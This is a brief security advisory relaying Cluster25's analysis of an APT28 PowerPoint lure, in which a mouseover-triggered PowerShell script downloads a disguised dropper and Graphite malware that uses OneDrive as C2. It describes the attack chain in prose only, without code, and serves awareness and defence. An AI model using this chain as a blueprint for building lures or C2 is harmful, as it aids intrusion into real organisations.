The threat intel team at Cluster25 have identified a PowerPoint document, linked to APT28 (aka Fancy Bear), which exploits a code execution technique when a user opens the document as a presentation and moves the mouse over a hyperlink. The PowerPoint ‘lure” document utilizes a template potentially linked to the Organization for Economic Co-operation and Development (Intergovernmental group based in Paris). The presentation contains 2 slides outlining the instructions for using the French-English/English-French Interpretation feature in Zoom meetings. The “mouseover” of a hyperlink on the slide triggers an embedded PowerShell script that downloads an encrypted JPEG file that is actually a malicious dropper DLL file. This file then downloads an additional encrypted JPEG file that contains Graphite Malware. Graphite Malware abuses the Microsoft Graph API to communicate with OneDrive acting as a Command and Control (C2) server. Graphite uses the Microsoft Graph API to query the OneDrive folder for new files, and if any are found they are downloaded. These files contain shellcode commands that are executed on the infected device. Once C2 communications have been established, Graphite can be leveraged to run scripts or download additional malware to the infected device.
Since this form of code execution, similar to the Excel MSHTML Remote Code Execution Vulnerability (CVE-2021-40444), does not rely on Macros, it can not just be disabled to mitigate the vulnerability. Currently there is no technical mitigation for this vulnerability, the primary defense is user training to not open files from untrusted senders/locations. Check back as we will update this post as more details on mitigation strategies are available .
Cluster25 Blog Article w/ detection info and IOCs – https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/